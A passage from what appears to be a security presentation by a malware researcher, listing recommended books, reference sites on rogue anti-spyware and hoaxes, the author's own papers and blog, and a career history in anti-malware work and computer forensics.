• Recommended Books
  • Viruses Revealed (Harley, Slade, Gattiker) – ISBN 0-07-213090-3
  • Hacking Exposed (Scambray, McClure, Kurtz) – ISBN 0-07-212748-1
• Site related to ‘spoof’ or ‘rogue’ anti-spyware tools.
  • http://www.spywarewarrior.com/rogue_anti-spyware.htm

Page 58: Useful sites…cont.

• Hoax, Scam, Urban Legend Reference Sites
  • http://cluestick.me.uk
  • http://snopes.com
• Papers and articles I’ve written
  • http://momusings.com/papers
• My Personal ‘Blog’
  • http://momusings.com/momusings
  • http://momusings.com/vsub

Page 59: Background

• Sun Alliance / Royal and Sun Alliance
  – Joined 1988
  – Commissioning PCs, Strategy (hardware and software)
  – Responsible for Malware Research/Prevention (10 years)
  – Ethical Hacker (2.5 years)
  – Helped set up Independent ISS UK User Group
  – WildList reporter, Charter member of AVIEN
• Outsourced April 2002
  – Joined EMEA IGS Security June 2002 as Malware/Anti-Malware SME
  – Moved to MSSD (EMEA) June 2004 to set up EMEA Virus CERT
  – Member of Global Virus CERT
  – Lead Computer Forensics Analyst for EMEA
  – Moved to ISS X-Force Professional Security Services April 2008
• 21 Years of knowledge on malware and related security threats.